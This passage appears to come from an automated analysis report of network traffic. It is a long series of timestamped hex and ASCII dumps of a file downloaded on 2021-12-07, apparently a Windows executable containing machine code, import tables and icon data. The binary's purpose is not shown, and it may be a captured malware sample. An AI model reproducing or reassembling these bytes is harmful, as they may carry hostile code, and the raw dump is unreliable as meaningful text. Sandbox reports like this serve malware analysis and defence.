5b 11 f8 58 0f 37 04 b2 f5 62 69 a4 13 ef 0d c4 ee ab 9d a2 85 2c 79 f6 42 b6 84 ac e0 49 9c 55 ee 38 7f
                                                                                              Data Ascii: hx--YUTwg]!sQl}!HD VfNt]FV8rj}7^FJH$bfjJu5=@I46cJe.AtqSnZ/u4tkTOc[MOk)"B"WG#s\kcJF:[f [X7bi,yBIU8
                                                                                              2021-12-07 12:39:07 UTC773INData Raw: 1e 5f e7 e9 a5 b1 bd 37 20 f9 d4 d9 4c 03 d6 36 27 19 5a 0d 14 4f fb f9 7a ec 99 21 f3 b0 b2 c6 1d c2 c9 c6 8b 3b b9 f2 53 34 e8 30 cf 05 7f de b9 7c 3a 77 6e 37 60 41 a4 5a 61 f6 49 78 d8 4b 1b a7 83 29 d2 76 c9 ba f7 c4 85 5d dd 29 8c 5e 1d 96 72 2b d0 ce ca 5f 2a 48 7b 6c af c6 b2 d9 c5 a7 9a fc 85 cb bb 38 8e de 2b 71 bf 90 93 20 46 0f 03 b6 24 f0 de 33 b3 53 0c f5 e0 91 f6 37 db 9c d1 4c e1 90 60 75 6b 25 ad b7 88 d9 9e be 00 41 70 a8 5f 67 df ed 09 9f 52 e9 50 7e ea 94 29 03 69 f5 9e 69 86 28 ef be d1 4e d0 af 92 88 11 d7 20 31 36 54 a4 ec 3c 5d c7 e6 53 2b c6 50 0e bc b7 31 b4 f0 c4 e2 33 58 cc 2b 59 3c 98 8d 83 8c 3b ef 8a 26 e9 dc 38 3d 60 65 06 d8 bf 66 5d 54 2f a3 91 72 d7 1c b4 63 60 36 c4 97 8c 94 6a 45 8c 57 c9 7c 5f 4c 74 cf 03 bd 0f 67 97
                                                                                              Data Ascii: _7 L6'ZOz!;S40|:wn7`AZaIxK)v])^r+_*H{l8+q F$3S7L`uk%Ap_gRP~)ii(N 16T<]S+P13X+Y<;&8=`ef]T/rc`6jEW|_Ltg
                                                                                              2021-12-07 12:39:07 UTC781INData Raw: 60 ce 71 33 ae cc 56 28 0c df 3c c6 f9 fb a6 df f2 5b d7 6d c5 53 65 2a 0d 12 a0 53 a5 d4 5d 29 ba f7 df 91 91 75 76 8c 71 56 bb 41 f7 fa 2e 85 ad 38 24 db c3 97 5b c3 c6 d4 13 c8 3a 55 58 bd a4 90 50 9b c8 d2 7f 39 ff c7 87 c5 9d 16 a8 a9 2c 03 9c 82 b8 04 62 38 60 17 b7 c5 3d 7e 7e ff ec 60 a9 f8 8f 7d 42 57 19 aa f0 eb ea 1a 93 fb ab d0 27 2e 55 20 c2 8a 74 05 de 1f 6f 69 e8 83 df b9 19 59 d6 60 8c cf 23 5c f8 40 0e c3 df 5c df 35 be d1 df 75 3e ce 43 1c f4 e2 e2 85 48 96 6b 29 61 02 e2 95 b5 b5 cd b1 a3 d7 8f 1d 24 bf 8f e1 9c 19 60 c7 89 30 68 d5 4c a6 86 3c 0f 98 48 39 bd fb 82 61 99 a6 8f 53 10 d8 f9 92 78 c0 12 01 61 af 17 78 c6 e6 f2 9c 2d 6d 3a dd e0 d7 65 4f 3e 93 ae ef 39 bf 30 55 14 6b f4 9e 95 97 e2 25 b1 8c c4 b5 89 9a a4 d3 c5 31 66 5d de
                                                                                              Data Ascii: `q3V(<[mSe*S])uvqVA.8$[:UXP9,b8`=~~`}BW'.U toiY`#\@\5u>CHk)a$`0hL<H9aSxax-m:eO>90Uk%1f]
                                                                                              2021-12-07 12:39:07 UTC789INData Raw: 40 ea d9 07 a8 97 d9 2e 16 63 53 92 82 c9 96 49 87 b2 9b 90 32 3c e9 db 73 af 06 55 f6 12 9c a8 a7 6c 92 f7 75 e0 fb d5 4a 75 14 0e 4d 11 e0 ac d2 36 39 b6 37 55 53 9b e3 d5 1b bb dc c6 46 ce 83 05 2c 34 71 5d 73 2f a5 6e 0e ba c1 e6 fe 99 fa d1 45 d3 16 26 2f d2 0a fc e7 04 4e e8 92 8f 96 b0 6d 9b ce 37 72 2b 64 4b af d9 08 4a 76 2f 94 91 99 99 8b e6 fb b0 3a 48 48 70 5a 5f 55 b6 69 47 78 97 85 41 b2 6a 6b 58 26 96 43 d2 80 5c bb cf b1 24 49 a2 9e 87 71 87 8a 46 f1 00 31 60 35 db e1 87 29 d9 20 7a 77 fd 3c 2c f4 1f ed bd a9 28 c3 54 c6 8f c5 08 57 92 ac f1 96 38 77 55 f3 38 56 6b 5f 28 f7 88 bb 41 51 ec 0c 0a c7 46 49 75 f9 63 91 1a 44 63 2a 0a 8b ad 76 14 dc 6d cd 8b 41 16 4b 38 d3 3a 68 03 4c 6d 6e 9c 2d b1 0a 88 46 34 d2 c1 c0 4d 43 18 b0 80 47 21 22
                                                                                              Data Ascii: @.cSI2<sUluJuM697USF,4q]s/nE&/Nm7r+dKJv/:HHpZ_UiGxAjkX&C\$IqF1`5) zw<,(TW8wU8Vk_(AQFIucDc*vmAK8:hLmn-F4MCG!"
                                                                                              2021-12-07 12:39:07 UTC797INData Raw: 9a 59 36 bf 41 ea 44 4a 6a 19 d6 89 ae 28 98 47 89 9e 64 5c 61 fb 72 f9 2f d2 9f b8 5c f2 f7 8c b2 7b 68 0f 0c f5 a8 56 08 ae 94 50 3c c7 56 f4 47 42 33 5b fe 8f c4 4a 21 03 18 9f d1 67 76 7b 3a 58 f8 17 ff df e6 86 86 11 80 e4 b1 12 03 b0 d7 50 2f e9 bc 5b 0a 7d 1b 20 01 3f 2d ef 22 aa 7c 34 ce 1b 54 d5 db 93 be ee 81 61 30 5c 31 00 d0 b6 ad 36 c3 c3 2d fa 28 e9 62 dc 98 6a a8 81 98 42 38 6f 9f 76 16 29 02 46 47 d8 4f 85 4b b6 78 8f b5 57 35 31 85 03 a1 ac fe 5e 6b 80 c5 90 4c 34 b6 bb 3f 7b 89 a0 84 d2 21 e7 9f d0 25 a4 7d 46 73 e6 56 32 40 c4 2e 0d 94 0d ee 9f 83 95 71 ac 84 c4 ce 09 5c 48 a8 5e c2 52 46 f6 67 bf 5d 27 a0 25 72 f7 dd 51 40 2c 32 26 3c f5 91 cb 44 ed ef 96 a7 d6 d9 ae 17 72 9c 8d 7c 7b 12 1b e6 43 49 eb 78 4a df 3b 8e 51 be b1 a2 ad 13
                                                                                              Data Ascii: Y6ADJj(Gd\ar/\{hVP<VGB3[J!gv{:XP/[} ?-"|4Ta0\16-(bjB8ov)FGOKxW51^kL4?{!%}FsV2@.q\H^RFg]'%rQ@,2&<Dr|{CIxJ;Q
                                                                                              2021-12-07 12:39:07 UTC805INData Raw: d4 8a af 4d 35 cb bb c4 ae 75 c3 0d 7e 96 47 2c 35 2d ff 9c 2a 9d 9f 9d 82 f7 70 82 3b 78 e4 6a 83 35 87 6e 44 44 dc cb f5 81 2f dc d3 3d 55 83 01 8c dc fe b6 d3 b3 8b 06 4d cd 43 d1 09 9e 09 1e f3 63 6e f8 e5 14 79 7b a0 ad fe 18 ca 03 62 de 7f 4f a8 fc 88 37 45 0a 00 6c 3f f1 73 ad 13 34 55 25 03 9c bb fe a1 ef c3 db 40 16 94 fa 6f cc 1c 2f f3 a5 b4 e3 92 0f 82 17 b9 97 a2 91 f4 f1 5a cd a2 47 b8 78 22 1d 91 08 5e ec 01 9e 56 2e 14 59 a2 c0 a6 64 34 66 47 7b 5d 25 2a 8c 7b 93 3d 6e fe f5 03 d1 6c e4 4b e9 2a 4a 73 cd d8 a4 07 76 78 e2 2d e6 00 d5 e8 3e 90 d2 7f 8e b6 fa 9e 7d cd b8 4c 63 fd ea 87 06 4d 9d 1a bf 72 3d f3 18 4d 94 b9 87 43 4a 2e a8 44 19 bb 7d 14 d8 90 9a a6 0c 6a de 9e 65 cf af 89 ff 42 87 74 6e 3c b4 56 79 41 a5 30 b1 c9 3d c6 cb af 8d
                                                                                              Data Ascii: M5u~G,5-*p;xj5nDD/=UMCcny{bO7El?s4U%@o/ZGx"^V.Yd4fG{]%*{=nlK*Jsvx->}LcMr=MCJ.D}jeBtn<VyA0=
                                                                                              2021-12-07 12:39:07 UTC812INData Raw: 9e 3e 0b a0 79 7a 74 f7 e0 0f 02 18 43 4e b7 29 7a a9 e2 5f 9f 88 47 20 d7 1a e9 e7 dd 7c 98 4a ed d6 5e ff c4 2a f2 19 7d 31 0c 7d 8c b1 3d 02 d3 a2 2e 4e 46 cb f3 b3 61 9c fa 00 14 a7 86 89 ac b5 a2 f7 28 5b f9 ce 0c 85 9d 41 ee 9f cc 31 05 62 52 67 17 2d 44 c5 7b c1 80 cc 60 77 3c 68 44 c5 f0 e0 d5 a4 b8 28 6f 31 59 2c 96 45 90 36 44 35 fc 8b aa 49 11 b4 6a 88 10 ac 2e a2 64 7e a9 1b a6 aa d4 a5 d5 b3 2a c3 ad ca 77 2f dc 8d 59 86 c3 a4 80 27 eb ff 06 2e 2f 21 ae c3 82 70 66 44 42 6d 82 c6 2a 8b 12 de 8a 79 11 ff dd 1b 8e cd e0 38 9b a3 60 0f 2a df 28 d0 81 c2 f1 ed e3 ac be de 73 1a 85 42 dd a3 bd a3 a5 a2 6b f9 9a be a2 a7 de b2 c3 27 ad f4 c3 7d d3 b5 11 12 01 35 59 37 dc 15 7a dc 76 b7 88 d2 99 e8 9d 79 83 90 ce b3 53 70 fd 91 38 63 d1 c1 f8 12 13
                                                                                              Data Ascii: >yztCN)z_G |J^*}1}=.NFa([A1bRg-D{`w<hD(o1Y,E6D5Ij.d~*w/Y'./!pfDBm*y8`*(sBk'}5Y7zvySp8c
                                                                                              2021-12-07 12:39:07 UTC820INData Raw: 7b 15 1b 0c 40 b7 27 cc 04 ca 36 51 b9 70 14 8b 6c d9 25 28 c2 93 8c 5f fc fe 3d af 18 85 7c fa 51 52 6b 56 f7 17 2d 11 01 65 f1 78 ea e5 8f f4 c5 42 6c ef 3c 85 94 cd 6f 3f 12 75 45 5b b8 8d 63 04 44 cd 98 c6 a8 19 54 b2 99 33 01 36 19 13 03 6f 71 b5 45 fd 3c 17 96 20 af a9 9c 97 25 71 44 e8 fb 34 fa 9e 73 d2 ef d8 9f 24 ac af 20 b8 13 11 43 57 4f 4b c6 d3 d7 23 e3 0f 3e 94 7d d1 85 39 4f 01 3b 3f 14 ad 2a 68 29 22 fc 08 d8 a1 2e 58 dc 28 77 6b e1 ca 43 b4 24 d8 ab ee c3 6f 94 ed f1 f3 29 31 6c 8f 06 63 b1 58 f1 1a f2 8c 8b 05 fa 6e 18 67 ba 4d 7e cc 37 2f 12 5f b1 74 f2 24 b7 c8 c5 c6 3b 24 86 39 22 b2 1a 15 98 4c 5f 1b c7 31 72 2c b3 6a 0b 6e 96 28 2e 74 06 2a e4 3f 64 8f 65 78 f4 d6 6a c2 d0 83 a2 a7 04 dd 2d e2 71 1e 5a 59 d7 6a 51 26 8f 56 c0 43 88
                                                                                              Data Ascii: {@'6Qpl%(_=|QRkV-exBl<o?uE[cDT36oqE< %qD4s$ CWOK#>}9O;?*h)".X(wkC$o)1lcXngM~7/_t$;$9"L_1r,jn(.t*?dexj-qZYjQ&VC
                                                                                              2021-12-07 12:39:07 UTC828INData Raw: 1f 1e 57 f7 8b ff 83 ba ab 94 dd f0 b8 ba 9f fe 43 eb 1e a6 b4 ed 55 c9 75 f7 8d 4a ae 3b 3c 86 1a 74 8f a1 d6 d9 64 ff 5d 25 dc 79 ce b3 e8 62 6d ac 05 b7 87 63 7d 4d e4 47 4d b3 af 90 46 55 17 c7 99 66 33 8e 77 52 76 f3 aa 34 ec 4b 18 6d 4a 8e de 08 e9 28 cc 9a e4 28 8c d3 66 51 da ac 68 5a cd 88 4e dd 94 23 1a b1 4f 36 82 a2 c7 f9 24 1d 45 29 3f f7 8b 46 fc da 1c bb 12 3c 7d f4 df 1f 89 3c ca ee d7 7e 7d 09 41 3f 06 2f 4b 1c 09 6b cf 23 51 48 69 e7 ea 69 a3 23 11 ba ac 07 28 92 3e 4f 2f f1 cb a5 68 1e a5 1e 2a de da f7 c5 79 b3 3d 70 44 36 e4 df f0 c0 16 b3 2e 2d b8 2c ba 2e 91 b1 57 c0 aa c3 f1 02 2a 74 e3 7d a2 d0 d9 26 b9 17 ab de 67 af 7a da 10 bb be cf 8c ab 41 7e d4 85 d0 15 d2 da ec e2 38 17 42 dc 1d 2b 28 ef c2 fb a2 d6 34 45 ea b8 4b f5 ae 3c
                                                                                              Data Ascii: WCUuJ;<td]%ybmc}MGMFUf3wRv4KmJ((fQhZN#O6$E)?F<}<~}A?/Kk#QHii#(>O/h*y=pD6.-,.W*t}&gzA~8B+(4EK<
                                                                                              2021-12-07 12:39:07 UTC836INData Raw: d5 47 da b9 15 aa 17 7d a4 07 51 8c 8b 3f d0 a4 b6 d1 ea 9e 19 53 5d 79 3c f3 e9 c9 d5 5d f7 d1 c9 ab fb e8 37 a2 ba 83 19 fc b1 aa 1f 3b c7 17 c7 21 33 49 12 40 fd d3 fb 12 3a 6c d0 8f 63 3d 1b f5 f9 0f f5 b2 24 0f 53 1d 21 ca 62 21 44 e2 46 81 4f 2b d3 e7 29 0a 0f bd 13 6d 21 e0 71 e3 3b f1 f0 38 46 2b d1 29 f2 ce f8 b0 c7 31 1b f8 54 4c 27 60 72 4a f6 2d 61 c9 0e 9e a5 34 15 5d 05 61 71 a4 40 0c 26 58 f0 aa e6 62 3f b4 9f 60 97 16 28 2f c1 ee 80 4b 7a 84 dd 27 00 ab 97 be 0d fb e3 66 83 a3 15 f7 0f 9b e3 61 97 e1 35 a3 67 fc b6 57 c7 6f 93 de 61 78 1d f5 4e 4f f8 ed b1 8b a3 f8 ed f5 bf 8b 29 fc 42 8f f8 ed ee 8b 4f 82 df 4a 2e 8e c3 6f 4b 65 2e 77 26 e1 b7 8b 2e 96 d8 68 2d 9f ff 79 f1 7f 1d bf 1d b8 48 e6 b8 9e 72 7c eb a2 ff 1a 7e 0b 5e 74 52 fc d6
                                                                                              Data Ascii: G}Q?S]y<]7;!3I@:lc=$S!b!DFO+)m!q;8F+)1TL'`rJ-a4]aq@&Xb?`(/Kz'fa5gWoaxNO)BOJ.oKe.w&.h-yHr|~^tR
                                                                                              2021-12-07 12:39:07 UTC844INData Raw: 81 1b 6e b4 1d a9 b7 78 fb f9 77 5a 02 37 da 82 13 9c 65 a6 59 a1 d1 4c 31 f8 86 a3 da 53 d5 b4 33 05 3d d9 2f 92 d2 49 0b d7 db 54 e1 50 26 66 98 15 8c a6 90 ad 72 a7 01 12 05 24 a6 81 99 93 1e 98 60 0d a4 06 56 5a 12 46 fa a7 67 52 37 70 cf 95 a8 cf 74 f3 48 db 3c 15 d4 0b 67 9e 49 32 18 ac 72 e8 05 22 d3 44 2f 0c 54 4b 06 e9 bd b0 f2 1b ee 85 d0 0d 39 b5 b9 d0 65 a5 08 de 8f 02 e5 56 b0 dd 88 89 1c 98 dd 3d 5d 55 cf 61 96 33 b4 4c a6 02 87 4f 57 27 a0 99 b4 9a b6 4d 2f 51 7f 7d 0e c1 79 46 5c 9d ea f9 d0 7a 0c 4d 9b 42 19 f5 e7 3a 31 25 11 47 fe 7a 7e 7e 2d ea 68 d3 b8 8e cb cd fa 1a d2 91 e9 bf ad d5 90 53 3b 3d 88 a1 ed 35 f3 f0 f3 b9 6e 27 06 ef b7 03 f5 6a 37 76 89 c1 db 41 e5 95 3b 48 f4 04 2a 34 03 f3 24 5d 5d 16 8d b6 41 46 5b 2f dc e8 8f a3 83
                                                                                              Data Ascii: nxwZ7eYL1S3=/ITP&fr$`VZFgR7ptH<gI2r"D/TK9eV=]Ua3LOW'M/Q}yF\zMB:1%Gz~~-hS;=5n'j7vA;H*4$]]AF[/
                                                                                              2021-12-07 12:39:07 UTC852INData Raw: 0e dc 1f 2a 24 b8 9b 7f 37 d2 ef 23 6d f8 2d a5 83 ba fe d0 87 60 7e 2d 5e 67 90 1e 7e f5 1a 3c cd e7 a7 1a 3c dd ce 4f 8f e2 e9 6e 9a 11 dc 46 13 f1 69 17 93 fa d4 8c e0 b8 d6 b9 a5 ae c6 a5 76 fb e6 ed f6 37 2a 36 fc 0b 5a cc ad 76 d6 ab 7d 9d 4a b3 bf b1 b5 b1 16 81 d8 9d f3 bb c2 5d 53 17 86 0d 2f bd fa c3 bd ec 0f a4 21 27 38 10 58 7a 13 89 d6 fc 41 ea 21 ec f3 e3 bb a7 39 da 6d b2 3b a9 c3 da 9b 7b d3 0e 7e 7b 59 e6 cd d9 db bd 13 fc aa d9 9b eb 57 ad de 4b 26 4d f2 9e 85 37 85 ab 6b af fe 33 a2 f9 df b4 8a a4 ed 4f f0 9b 45 be 05 f9 cd 18 ea ac 7c 93 d4 ff 42 aa ff 4d 53 e8 93 b2 0b 66 94 c2 9d f6 25 60 f5 36 5a b4 f1 a4 4a a0 e9 81 9b 45 06 47 5b 62 87 b6 7d 3c 42 ef 08 d2 63 1f 54 c9 5f d7 6c ae 93 5f b2 7a d3 fe 50 8c 7d fb 59 78 91 b9 67 8b dc
                                                                                              Data Ascii: *$7#m-`~-^g~<<OnFiv7*6Zv}J]S/!'8XzA!9m;{~{YWK&M7k3OE|BMSf%`6ZJEG[b}<BcT_l_zP}Yxg
                                                                                              2021-12-07 12:39:07 UTC859INData Raw: 79 45 57 fb 2b 16 62 04 05 cb 3b e1 fd 06 c7 32 b5 ff 8e 4c 30 17 02 21 06 7d 9d 38 3a 21 50 7c f0 19 e8 71 ed 2e 1b 82 13 fc 9e 09 4e 32 2a 75 8f 3d 33 67 d8 bb e6 66 b8 75 08 14 ef a8 3c 84 93 23 2b 96 a7 5c e7 df d9 9a 9f 8d 03 37 f2 02 60 74 ee 01 c5 f4 4e 2b 9c 9c 54 8f 7f a4 d3 5e f5 34 93 9a ef b4 1e 6d a6 f7 90 25 f7 96 47 3a 7d 7d c6 b9 de 5d f1 4d 7b 35 eb eb ec 7e ac 6c c8 cc 61 7b cd e0 91 ee 46 c6 c3 45 a6 93 fc 4d ad 79 d9 4d 28 19 f9 be 83 66 80 11 fe 08 18 48 4d 66 b0 83 5a 5c d8 11 b4 28 6f 96 45 e6 2e 4a 71 b9 9b 16 a7 82 29 1c 28 d8 1f 40 94 c9 cb 2e 06 01 79 1e c7 7e 13 c9 83 cb 8c 2e 3a 02 48 69 5c 94 02 d9 50 5c d4 e5 7f 47 65 95 82 66 a5 78 07 d5 71 28 c2 a0 fc 8c f3 e8 fa a3 53 94 3d c1 31 0f 90 53 e7 c3 cf 73 ac d6 dc d9 fb bd c6
                                                                                              Data Ascii: yEW+b;2L0!}8:!P|q.N2*u=3gfu<#+\7`tN+T^4m%G:}}]M{5~la{FEMyM(fHMfZ\(oE.Jq)(@.y~.:Hi\P\Gefxq(S=1Ss
                                                                                              2021-12-07 12:39:07 UTC867INData Raw: fa 25 d8 a8 be e9 63 a8 20 43 02 09 9f a1 b3 64 91 38 16 da 40 74 7a 9d 25 81 bc 2b 80 f8 29 46 fa 64 7e 93 81 4e 3b c3 48 fb 23 9d 0c ab 8d 22 69 d9 0c 69 f1 06 0b dc 90 66 3a 31 21 5d bb 13 49 df 61 0e c0 f7 02 d8 7b a4 22 22 7a e8 f5 3d b2 e8 74 f4 f8 f9 72 23 f0 e3 12 43 16 7e b8 42 58 91 96 a6 20 2b 0e c2 b3 84 a7 c8 9a 27 9d c6 18 d8 49 41 62 e9 71 4d d1 d2 29 83 5e 73 92 31 41 c2 93 91 6b 8f 47 f4 ba 2c 76 cd 94 5e c1 ce a4 63 75 b8 30 e9 99 2a b8 31 69 5b 9c 5c ec f9 94 db 99 fc 48 a8 72 b7 de b4 3c 22 61 c9 3a 90 a2 25 82 85 5e bb 9b 69 8c 60 43 f6 66 eb d6 9b 96 6e c4 9f c8 51 92 a6 01 21 d1 9e b4 ac a1 c0 f7 e9 18 f5 64 7c 13 ed d0 9e 7e 86 63 15 c7 e4 63 71 72 b1 e7 99 40 25 3b f2 4d a1 f3 e8 cd ea 9a 94 23 df 2c 76 5f 21 83 5e 07 58 e9 1c ed
                                                                                              Data Ascii: %c Cd8@tz%+)Fd~N;H#"iif:1!]Ia{""z=tr#C~BX +'IAbqM)^s1AkG,v^cu0*1i[\Hr<"a:%^i`CfnQ!d|~ccqr@%;M#,v_!^X
                                                                                              2021-12-07 12:39:07 UTC875INData Raw: ae 38 99 b2 d7 34 9e ab 4f 59 78 27 5d ee a7 bf 30 6f c3 e0 ec a6 bf d4 34 de 75 39 52 af e8 a7 80 ab f7 86 77 68 bb ee 6e c7 25 67 f3 07 0a c6 f9 34 9d be ef a6 cf 8c f6 ef ce fa ac d1 de 79 09 57 87 c5 7c 69 fb b2 35 6f 7b 36 7f 5f f2 2f 3f 1a 96 d6 34 4e 3b 2b 09 3c 12 db 85 4a 3b fb 2c d3 2f 70 fd 6f 43 fd f7 9f 1e dd 65 fa c1 3b 3b 54 79 71 2f be ed 76 73 cd a0 fe f1 db 3d 26 04 fc b2 c2 af ed d3 1b ad 66 9c f2 f3 08 59 3d 75 bc 57 d6 17 69 d7 5b ee e7 b5 bf fc 61 c7 53 93 fb 28 43 e6 e9 6d 87 ef fa ee da 76 75 d2 27 ad 37 67 3f fc f0 ab 95 6d 17 9c be fa a9 4b 67 0f de f8 35 39 2b 8f 5d 78 f7 ea 9d f5 13 96 46 5e 11 7e 99 91 77 fd 5e 8b 4e b9 7d 72 fa cf d7 d4 18 31 fe f3 39 1d e6 af d0 c4 9e ab f1 d5 37 7e d7 9e 8c 89 55 ac 39 5d df dc aa f9 fd 33
                                                                                              Data Ascii: 84OYx']0o4u9Rwhn%g4yW|i5o{6_/?4N;+<J;,/poCe;;Tyq/vs=&fY=uWi[aS(Cmvu'7g?mKg59+]xF^~w^N}r197~U9]3
                                                                                              2021-12-07 12:39:07 UTC883INData Raw: 9e dd 79 f7 93 fe 81 1f 5e 1f 73 e5 c4 fd 2e 3d a6 4d ee 14 e4 c3 69 f1 49 d9 67 9c 2b 47 0e ff 11 74 e7 a3 a2 07 4f ee fc d2 7b dc 92 d3 c1 86 13 c7 16 36 d8 f4 d9 da 96 57 d6 87 d4 37 b4 f0 c8 98 3c 23 63 cc f1 d0 88 b8 9e 57 3f 5a 24 57 8a 77 7d fe 6b 74 c4 47 d7 86 a9 8f 0c 53 ce 59 fd fe e0 97 c3 36 95 7e c8 cd 8f d9 38 57 aa 3b f3 62 ce e0 39 c5 de c3 66 3d 3d 9f f4 c9 92 b2 07 9d f7 af 2b 18 76 21 db 14 7e fc 5f cb b8 b3 5d a3 46 1e f6 26 d7 86 53 27 4f 9c 3c c1 fc 9e 69 47 ab eb fe b8 de 4c fe 2b d3 0e d6 2b 7f ee 37 6f 99 a9 f1 d4 47 da 43 df f9 1a 5a 5e 8e 6b f1 e5 99 7b da c2 86 1d a7 f5 6a dd 6b f3 91 8f 7e d3 fa 6f da 99 62 dc 5a f3 6b e9 8c 3b 5a a1 7a 6f cf 71 d7 be 5f bc ff 87 1b da 83 2f 5e 9c d2 4d 6b 34 f6 c4 a7 57 b5 3d c2 87 fc 12 71
                                                                                              Data Ascii: y^s.=MiIg+GtO{6W7<#cW?Z$Ww}ktGSY6~8W;b9f==+v!~_]F&S'O<iGL++7oGCZ^k{jk~obZk;Zzoq_/^Mk4W=q
                                                                                              2021-12-07 12:39:07 UTC891INData Raw: 0d 70 9b 40 00 8b 4d d8 83 c1 fe 83 f9 41 0f 87 f4 13 00 00 ff 24 8d 8f 28 40 00 53 50 e8 32 38 00 00 e9 64 0d 00 00 ff 05 2c e3 42 00 39 5d cc 0f 84 55 0d 00 00 53 ff 15 f8 71 40 00 e9 49 0d 00 00 50 e8 b0 fe ff ff 48 53 50 e8 c4 fe ff ff e9 be 13 00 00 53 50 e8 f8 37 00 00 e9 a7 13 00 00 53 e8 ef 14 00 00 83 f8 01 7f 03 33 c0 40 50 ff 15 88 70 40 00 e9 8d 13 00 00 ff 75 cc ff 15 fc 71 40 00 e9 7f 13 00 00 c1 e0 02 39 5d e4 75 22 8b 88 e0 eb 42 00 6a 01 89 88 20 ec 42 00 e8 b2 14 00 00 8b 4d dc 89 04 8d e0 eb 42 00 e9 55 13 00 00 8b 88 20 ec 42 00 89 88 e0 eb 42 00 e9 44 13 00 00 8b 45 e4 8d 34 85 e0 eb 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e8 8b 44 85 dc 89 0e e9 2e 13 00 00 ff 34 95 e0 eb 42 00 56 e9 be 12 00 00 8b 0d 30 e3 42 00 8b 35 60 72 40 00 3b
                                                                                              Data Ascii: p@MA$(@SP28d,B9]USq@IPHSPSP7S3@Pp@uq@9]u"Bj BMBU BBDE4B3;#MD.4BV0B5`r@;
                                                                                              2021-12-07 12:39:07 UTC898INData Raw: 05 00 f4 42 00 4f 75 9a 53 55 e8 b5 22 00 00 e9 06 ff ff ff 39 1d f4 eb 42 00 74 7b 6a 03 e8 71 28 00 00 6a 04 8b e8 e8 68 28 00 00 6a 05 8b f0 e8 5f 28 00 00 3b eb 8b f8 74 48 3b f3 74 44 3b fb 74 40 8d 44 24 1c 50 6a 28 ff 15 98 70 40 00 50 ff d5 85 c0 74 2c 8d 44 24 24 50 68 24 91 40 00 53 ff d6 53 53 8d 44 24 28 53 50 53 ff 74 24 30 c7 44 24 38 01 00 00 00 c7 44 24 44 02 00 00 00 ff d7 53 6a 02 ff 15 24 72 40 00 85 c0 75 07 6a 09 e8 bf df ff ff a1 0c ec 42 00 83 f8 ff 74 04 89 44 24 18 ff 74 24 18 ff 15 a0 70 40 00 a1 10 90 40 00 83 f8 ff 74 0e 50 ff 15 ec 70 40 00 83 0d 10 90 40 00 ff 6a 07 68 00 58 43 00 e8 c8 1d 00 00 c3 83 ec 14 53 55 56 8b 35 70 eb 42 00 57 6a 06 e8 ac 27 00 00 33 db 3b c3 74 12 ff d0 0f b7 c0 50 68 00 50 43 00 e8 d6 23 00 00 eb
                                                                                              Data Ascii: BOuSU"9Bt{jq(jh(j_(;tH;tD;t@D$Pj(p@Pt,D$$Ph$@SSSD$(SPSt$0D$8D$DSj$r@ujBtD$t$p@@tPp@@jhXCSUV5pBWj'3;tPhPC#
                                                                                              2021-12-07 12:39:07 UTC906INData Raw: 00 83 f8 ff 89 45 08 0f 84 b7 00 00 00 8d 85 e4 fe ff ff 6a 3f 50 8d b5 e4 fe ff ff e8 33 01 00 00 80 38 00 74 09 80 7d e8 00 74 03 8d 75 e8 80 3e 2e 75 11 8a 46 01 84 c0 74 68 3c 2e 75 06 80 7e 02 00 74 5e 56 53 e8 ea 05 00 00 f6 85 b8 fe ff ff 10 74 15 8b 45 0c 83 e0 03 3c 03 75 44 ff 75 0c 57 e8 f3 fe ff ff eb 39 57 e8 7e 02 00 00 57 ff 15 44 71 40 00 85 c0 75 20 f6 45 0c 04 74 12 57 6a f1 e8 4b f9 ff ff 6a 00 57 e8 f3 02 00 00 eb 10 ff 05 e8 eb 42 00 eb 08 57 6a f2 e8 31 f9 ff ff 8d 85 b8 fe ff ff 50 ff 75 08 ff 15 3c 71 40 00 85 c0 0f 85 52 ff ff ff ff 75 08 ff 15 38 71 40 00 83 7d fc 00 74 04 80 63 ff 00 33 f6 5b 39 75 fc 74 4d 39 75 f8 75 08 ff 05 e8 eb 42 00 eb 40 57 e8 44 08 00 00 85 c0 74 36 57 e8 36 00 00 00 57 e8 f5 01 00 00 57 ff 15 d0 70 40
                                                                                              Data Ascii: Ej?P38t}tu>.uFth<.u~t^VStE<uDuW9W~WDq@u EtWjKjWBWj1Pu<q@Ru8q@}tc3[9utM9uuB@WDt6W6WWp@
                                                                                              2021-12-07 12:39:07 UTC914INData Raw: 7b 00 00 82 7b 00 00 90 7b 00 00 a4 7b 00 00 b0 7b 00 00 bc 7b 00 00 d2 7b 00 00 72 79 00 00 66 79 00 00 5a 79 00 00 3e 79 00 00 30 79 00 00 22 79 00 00 0c 79 00 00 f6 78 00 00 e2 78 00 00 d0 78 00 00 be 78 00 00 b0 78 00 00 9a 78 00 00 7c 78 00 00 60 78 00 00 54 78 00 00 48 78 00 00 f0 77 00 00 36 78 00 00 2a 78 00 00 1a 78 00 00 08 78 00 00 fa 77 00 00 cc 7a 00 00 00 00 00 00 cc 80 00 00 b6 80 00 00 a4 80 00 00 94 80 00 00 80 80 00 00 e4 80 00 00 00 00 00 00 dc 7d 00 00 e8 7d 00 00 fa 7d 00 00 0a 7e 00 00 1c 7e 00 00 2c 7e 00 00 3c 7e 00 00 4e 7e 00 00 5e 7e 00 00 6c 7e 00 00 7e 7e 00 00 8a 7e 00 00 98 7e 00 00 aa 7e 00 00 ba 7e 00 00 c8 7e 00 00 da 7e 00 00 ec 7e 00 00 fe 7e 00 00 12 7f 00 00 ca 7d 00 00 34 7f 00 00 46 7f 00 00 54 7f 00 00 66 7f 00 00
                                                                                              Data Ascii: {{{{{{{ryfyZy>y0y"yyxxxxxx|x`xTxHxw6x*xxxwz}}}~~,~<~N~^~l~~~~~~~~~~~}4FTf
                                                                                              2021-12-07 12:39:07 UTC922INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 9c 47 0a d3 99 46 33 d2 95 44 73 d4 99 47 ad d5 9a 46 dd d6 9b 47 fa d5 9a 47 fd d5 9b 47 ff d5 9b 47 ff d5 9b 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 